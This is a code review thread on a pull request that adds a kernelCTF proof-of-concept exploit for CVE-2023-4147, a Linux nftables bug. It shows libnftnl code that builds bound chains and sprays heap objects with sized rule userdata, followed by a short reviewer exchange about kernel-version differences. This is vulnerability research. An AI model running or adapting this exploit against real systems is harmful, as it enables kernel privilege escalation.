pocs/linux/kernelctf/CVE-2023-4147_mitigation/exploit/mitigation-6.1/exploit.c

```diff
@@ -0,0 +1,996 @@
+    nftnl_rule_add_expr(rule_bind_chain_1_2, expr_immediate);
+
+    struct nftnl_rule * rule_lookup_set1 = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_lookup_set1, NFTNL_RULE_TABLE, table1_name);
+    // nftnl_rule_set_str(rule_lookup_set1, NFTNL_RULE_CHAIN, chain2_name);
+    nftnl_rule_set_u32(rule_lookup_set1, NFTNL_RULE_CHAIN_ID, chain_id);
+
+    struct nftnl_expr * expr_lookup = nftnl_expr_alloc("lookup");
+    nftnl_expr_set_u32(expr_lookup, NFTNL_EXPR_LOOKUP_SREG, NFT_REG32_00);
+    nftnl_expr_set_str(expr_lookup, NFTNL_EXPR_LOOKUP_SET, set1_name);
+    nftnl_expr_set_u32(expr_lookup, NFTNL_EXPR_LOOKUP_SET_ID, 1337);
+    nftnl_rule_add_expr(rule_lookup_set1, expr_lookup);
+
+    struct nftnl_chain * chains_victim2[VICTIM_SPARY_COUNT];
+    struct nftnl_rule * rules_bind_victim_victim2[VICTIM_SPARY_COUNT];
+    struct nftnl_rule * rules_victim2[VICTIM_SPARY_COUNT];
+    struct nftnl_expr * expr_counter;
+
+    char* chain_victim2_name;
+    char rule_data[0x100] = {0,};
+
+    for(int i = 0 ; i < VICTIM_SPARY_COUNT; i++){
+        asprintf(&chain_victim2_name, "c_%010hx", i);
+
+        chains_victim2[i] = nftnl_chain_alloc();
+        nftnl_chain_set_str(chains_victim2[i], NFTNL_CHAIN_TABLE, table2_name);
+        nftnl_chain_set_str(chains_victim2[i], NFTNL_CHAIN_NAME, chain_victim2_name);
+        nftnl_chain_set_u32(chains_victim2[i], NFTNL_CHAIN_FLAGS, NFT_CHAIN_BINDING);
+
+        rules_bind_victim_victim2[i] = nftnl_rule_alloc();
+
+        nftnl_rule_set_str(rules_bind_victim_victim2[i], NFTNL_RULE_TABLE, table2_name);
+        nftnl_rule_set_str(rules_bind_victim_victim2[i], NFTNL_RULE_CHAIN, chain_victim_name);
+
+        expr_immediate = nftnl_expr_alloc("immediate");
+        nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
+        nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
+        nftnl_expr_set_str(expr_immediate, NFTNL_EXPR_IMM_CHAIN, chain_victim2_name);
+
+        nftnl_rule_add_expr(rules_bind_victim_victim2[i], expr_immediate);
+
+        for(int j = 0 ; j < 12; j++){
+            expr_counter = nftnl_expr_alloc("counter");
+            nftnl_rule_add_expr(rules_bind_victim_victim2[i], expr_counter);
+        }
+
+        rules_victim2[i] = nftnl_rule_alloc();
+
+        memset(rule_data, 'b', 0x100);
+
+        nftnl_rule_set_str(rules_victim2[i], NFTNL_RULE_TABLE, table2_name);
+        nftnl_rule_set_str(rules_victim2[i], NFTNL_RULE_CHAIN, chain_victim2_name);
+        nftnl_rule_set_data(rules_victim2[i], NFTNL_RULE_USERDATA, rule_data, 192-25);
+    }
+
+    struct nftnl_rule * rule_target = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_target, NFTNL_RULE_TABLE, table3_name);
+    nftnl_rule_set_str(rule_target, NFTNL_RULE_CHAIN, chain_target_name);
+    nftnl_rule_set_data(rule_target, NFTNL_RULE_USERDATA, rule_data, 192-25-24);
+
+    expr_counter = nftnl_expr_alloc("counter");
```

Comment:
In COS exploit PR#112 you rely on "last" expression. Is there a specific reason to use "counter" expression in mitigation exploit?

Reply:
I used the different objects due to the different kernel versions of the COS (5.15) and mitigation (6.1) instances. I added a comment to the exploit.c.

Reply:
Thanks for explanation